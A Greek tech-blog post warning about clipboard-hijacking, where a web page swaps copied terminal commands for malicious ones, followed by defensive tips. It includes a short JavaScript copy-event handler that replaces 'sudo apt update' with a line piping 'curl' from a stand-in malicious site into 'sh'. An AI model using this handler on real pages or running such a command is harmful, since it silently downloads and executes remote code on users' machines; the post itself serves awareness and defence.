Μια ασυνήθιστη επίδειξη hacking θα σας κάνει να σκεφτείτε δύο φορές πριν κάνετε οποιοδήποτε κείμενο αντιγραφή – επικόλληση.
Αυτός είναι ο λόγος που ΠΟΤΕ δεν πρέπει να αντιγράψετε εντολές επικόλλησης απευθείας στο τερματικό σας. Ρωτήστε οποιονδήποτε προγραμματιστή ή διαχειριστή εάν έχει αντιγράψει ποτέ μια γραμμή εντολών ή ένα απόσπασμα κώδικα από τον ιστό. Η απάντηση μάλλον θα ήταν ΝΑΙ. Θα υποθέτετε ότι αυτό που αντιγράψατε είναι αυτό που επικολλάτε, σωστά; Λοιπόν, όχι!
Νομίζετε ότι αντιγράφετε ένα πράγμα, αλλά αντικαθίσταται με κάτι άλλο, όπως κακόβουλο κώδικα. Το μόνο που χρειάζεται είναι μια ενιαία γραμμή κώδικα που εισάγεται στον κώδικα που αντιγράψατε για να δημιουργήσετε μια κερκόπορτα στην εφαρμογή σας.
Αυτή η επίθεση είναι πολύ απλή αλλά μπορεί να προκαλέσει μεγάλες ζημιές. Να δούμε πώς λειτουργεί στην πράξη:
Ευχαριστούμε τον Harel Friedlander για την εγγραφή αυτού του βίντεο.
Ας υποθέσουμε ότι ψάχνετε πώς να ενημερώσετε το ubuntu σας και βρήκατε την παρακάτω εντολή, Την αντιγράφετε. Δοκιμάστε το – αντιγράψτε και επικολλήστε την παρακάτω εντολή:
$ sudo apt update
Εδώ είναι το JavaScript που τρέχει το exploit.
document.getElementById(‘copyme’).addEventListener(‘copy’, function(e) {
e.clipboardData.setData(‘text/plain’,
‘echo “τo sudo apt update έγινε [curl http://kakovoulo-site.com | sh]”\n’
);
e.preventDefault();
});
[su_button url=”https://itechnews.gr/2020/04/itechnews-gr-tora-pia-episima-kai-sta-google/” target=”blank” style=”bubbles” background=”#0726db” color=”#ffffff” size=”10″ wide=”yes” center=”yes” radius=”20″ icon=”https://itechnews.gr/wp-content/uploads/2021/08/google_news.jpg” icon_color=”#060606″ text_shadow=”2px 2px 2px #000000″ rel=”lightbox”]Ακολουθήστε το iTechNews.gr στο Google News! Παρακολουθήστε τα τελευταία νέα, τάσεις, αξεσουάρ και παρουσιάσεις[/su_button]
Πως να προστατευτώ;
Ο ασφαλέστερος τρόπος είναι να μην επικολλήσετε τίποτα από τον Ιστό στο τερματικό σας. Μια άλλη επιλογή είναι να προσθέσετε “#” πριν την επικόλληση, αυτό θα μετατρέψει την εντολή σε “σχόλιο” και δεν θα την εκτελέσει. Με αυτό τον τρόπο θα δείτε τι θα επικολλήσετε πριν το τρέξει το τερματικό σας. Μπορείτε φυσικά να επικολλήσετε την εντολή σε ένα txt αρχείο πριν την βάλετε στο terminal σας.
Επίσης πολλά τερματικά μπορούν να ρυθμιστούν ώστε να μην τρέχουν αυτόματα όταν επικολλάτε ένα “\n” (νέα γραμμή)
Το παραπάνω ήταν μόνο ένα παράδειγμα γιατί η ευαισθητοποίηση είναι απαραίτητη για την αποφυγή κάθε εισβολής. Υπάρχουν πολλά παραδείγματα πραγματικά κακόβουλα scripts που κυκλοφορούν στο διαδίκτυο.
[signoff]
Εσείς πάντως μην ξεχάσετε να γραφτείτε στις ειδοποιήσεις μας 
, ώστε να ενημερωθείτε πρώτοι για τις πιο HOT προσφορές της ημέρας και ακόμη περισσότερες στο κανάλι μου στο Telegram και κάντε Like & Share την σελίδα μας στο Facebook.
Θα χαρώ να βοηθήσω και να απαντήσω απορίες σας. Θα με βρείτε στο Messenger ως Unpackman Review. Αφήστε μου ένα σχόλιο στο βίντεο ή στείλετε μου ένα email στο unpackmanreview@gmail.com. Κάντε SUBSCRIBE και πατήστε την ειδοποίηση (
) στο κανάλι μου.
Unpackman
